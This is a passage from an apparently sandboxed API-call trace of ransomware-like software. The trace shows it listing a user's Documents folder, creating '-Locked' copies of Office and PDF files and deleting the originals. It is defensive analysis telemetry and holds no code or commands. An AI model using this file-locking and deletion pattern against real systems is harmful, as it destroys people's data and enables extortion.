hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c3a4ac, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c3a4ac, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c3a4ac, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pA5CsH5h5CcswZCjqi.docx-Locked", cAlternateFileName="PA5CSH~2.DOC")) returned 1 [0302.180] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x336835d9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x336835d9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x336835d9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pA5CsH5h5CcswZCjqi.docx-Locked-Locked", cAlternateFileName="PA5CSH~1.DOC")) returned 1 [0302.181] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc54d42a0, ftCreationTime.dwHighDateTime=0x1d7dcc2, ftLastAccessTime.dwLowDateTime=0xf09fdea0, ftLastAccessTime.dwHighDateTime=0x1d7dd20, ftLastWriteTime.dwLowDateTime=0xf09fdea0, ftLastWriteTime.dwHighDateTime=0x1d7dd20, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uuXtJUWZmGeM k7fGnf", cAlternateFileName="UUXTJU~1")) returned 1 [0302.181] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c48e1b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c48e1b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c48e1b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="W7ZbDBvsnGLTRWeGfJh.pptx-Locked", cAlternateFileName="W7ZBDB~2.PPT")) returned 1 [0302.181] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3368984b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3368984b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3368984b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="W7ZbDBvsnGLTRWeGfJh.pptx-Locked-Locked", cAlternateFileName="W7ZBDB~1.PPT")) returned 1 [0302.182] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c5a17a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c5a17a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c5a17a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yPcZCDl_ldX.pptx-Locked", cAlternateFileName="YPCZCD~2.PPT")) returned 1 [0302.182] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3368e5ec, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3368e5ec, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3368e5ec, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yPcZCDl_ldX.pptx-Locked-Locked", cAlternateFileName="YPCZCD~1.PPT")) returned 1 [0302.182] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c6ff73, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c6ff73, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c6ff73, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zBhJ.pdf-Locked", cAlternateFileName="ZBHJ~1.PDF")) returned 1 [0302.182] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33866cbc, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x33866cbc, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x33866cbc, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zBhJ.pdf-Locked-Locked", cAlternateFileName="ZBHJ~2.PDF")) returned 1 [0302.183] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32c7d5f1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32c7d5f1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32c7d5f1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZFnXJ8 _1nRlfFhG.docx-Locked", cAlternateFileName="ZFNXJ8~2.DOC")) returned 1 [0302.183] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3386e285, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3386e285, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3386e285, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZFnXJ8 _1nRlfFhG.docx-Locked-Locked", cAlternateFileName="ZFNXJ8~1.DOC")) returned 1 [0302.183] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3386e285, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3386e285, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3386e285, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZFnXJ8 _1nRlfFhG.docx-Locked-Locked", cAlternateFileName="ZFNXJ8~1.DOC")) returned 0 [0302.183] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0302.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0302.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0302.184] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked-Locked", lpFilePart=0x0) returned 0x37 [0302.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.184] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\1feg.xlsx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.184] GetFileType (hFile=0x49c) returned 0x1 [0302.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.184] GetFileType (hFile=0x49c) returned 0x1 [0302.186] CloseHandle (hObject=0x49c) returned 1 [0302.187] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked", lpFilePart=0x0) returned 0x30 [0302.187] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\1feg.xlsx-locked")) returned 1 [0302.187] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x3e [0302.187] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.188] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\1feg.xlsx-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.188] GetFileType (hFile=0x49c) returned 0x1 [0302.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.188] GetFileType (hFile=0x49c) returned 0x1 [0302.190] CloseHandle (hObject=0x49c) returned 1 [0302.190] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked-Locked", lpFilePart=0x0) returned 0x37 [0302.190] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\1FEg.xlsx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\1feg.xlsx-locked-locked")) returned 1 [0302.191] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked-Locked", lpFilePart=0x0) returned 0x3d [0302.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.191] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\2xkt2 -erd.pptx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.191] GetFileType (hFile=0x49c) returned 0x1 [0302.191] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.191] GetFileType (hFile=0x49c) returned 0x1 [0302.193] CloseHandle (hObject=0x49c) returned 1 [0302.193] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked", lpFilePart=0x0) returned 0x36 [0302.193] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\2xkt2 -erd.pptx-locked")) returned 1 [0302.194] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x44 [0302.194] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.194] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\2xkt2 -erd.pptx-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.194] GetFileType (hFile=0x49c) returned 0x1 [0302.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.194] GetFileType (hFile=0x49c) returned 0x1 [0302.196] CloseHandle (hObject=0x49c) returned 1 [0302.196] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked-Locked", lpFilePart=0x0) returned 0x3d [0302.196] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\2XKT2 -erD.pptx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\2xkt2 -erd.pptx-locked-locked")) returned 1 [0302.197] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked-Locked", lpFilePart=0x0) returned 0x3f [0302.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.197] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4 yebkiybigx.xlsx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.197] GetFileType (hFile=0x49c) returned 0x1 [0302.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.197] GetFileType (hFile=0x49c) returned 0x1 [0302.199] CloseHandle (hObject=0x49c) returned 1 [0302.199] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked", lpFilePart=0x0) returned 0x38 [0302.199] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4 yebkiybigx.xlsx-locked")) returned 1 [0302.200] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x46 [0302.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.200] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4 yebkiybigx.xlsx-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.201] GetFileType (hFile=0x49c) returned 0x1 [0302.201] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.201] GetFileType (hFile=0x49c) returned 0x1 [0302.202] CloseHandle (hObject=0x49c) returned 1 [0302.203] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked-Locked", lpFilePart=0x0) returned 0x3f [0302.203] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4 yebkiYbIGx.xlsx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4 yebkiybigx.xlsx-locked-locked")) returned 1 [0302.203] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked-Locked", lpFilePart=0x0) returned 0x38 [0302.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.204] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4gh0y9.pdf-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.204] GetFileType (hFile=0x49c) returned 0x1 [0302.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.204] GetFileType (hFile=0x49c) returned 0x1 [0302.205] CloseHandle (hObject=0x49c) returned 1 [0302.206] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked", lpFilePart=0x0) returned 0x31 [0302.206] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4gh0y9.pdf-locked")) returned 1 [0302.206] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked-Locked-Locked", lpFilePart=0x0) returned 0x3f [0302.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.206] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4gh0y9.pdf-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.207] GetFileType (hFile=0x49c) returned 0x1 [0302.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.207] GetFileType (hFile=0x49c) returned 0x1 [0302.208] CloseHandle (hObject=0x49c) returned 1 [0302.209] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked-Locked", lpFilePart=0x0) returned 0x38 [0302.209] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\4GH0Y9.pdf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4gh0y9.pdf-locked-locked")) returned 1 [0302.209] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked-Locked", lpFilePart=0x0) returned 0x39 [0302.209] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.209] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\88z1o5.docx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.210] GetFileType (hFile=0x49c) returned 0x1 [0302.210] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.210] GetFileType (hFile=0x49c) returned 0x1 [0302.211] CloseHandle (hObject=0x49c) returned 1 [0302.212] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked", lpFilePart=0x0) returned 0x32 [0302.212] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\88z1o5.docx-locked")) returned 1 [0302.212] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x40 [0302.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.212] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\88z1o5.docx-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.213] GetFileType (hFile=0x49c) returned 0x1 [0302.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.213] GetFileType (hFile=0x49c) returned 0x1 [0302.214] CloseHandle (hObject=0x49c) returned 1 [0302.215] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked-Locked", lpFilePart=0x0) returned 0x39 [0302.215] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\88Z1o5.docx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\88z1o5.docx-locked-locked")) returned 1 [0302.215] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked-Locked", lpFilePart=0x0) returned 0x47 [0302.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.215] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\9wui5evhxpkholhgpv40.docx-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.224] GetFileType (hFile=0x49c) returned 0x1 [0302.224] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.224] GetFileType (hFile=0x49c) returned 0x1 [0302.226] CloseHandle (hObject=0x49c) returned 1 [0302.226] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked", lpFilePart=0x0) returned 0x40 [0302.226] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\9wui5evhxpkholhgpv40.docx-locked")) returned 1 [0302.227] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4e [0302.227] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.227] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\9wui5evhxpkholhgpv40.docx-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.227] GetFileType (hFile=0x49c) returned 0x1 [0302.227] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.227] GetFileType (hFile=0x49c) returned 0x1 [0302.229] CloseHandle (hObject=0x49c) returned 1 [0302.229] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked-Locked", lpFilePart=0x0) returned 0x47 [0302.229] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\9wui5eVHXPKhOlhGPv40.docx-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\9wui5evhxpkholhgpv40.docx-locked-locked")) returned 1 [0302.230] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\awNrFZy3e3qK1nkjdW.pptx-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: 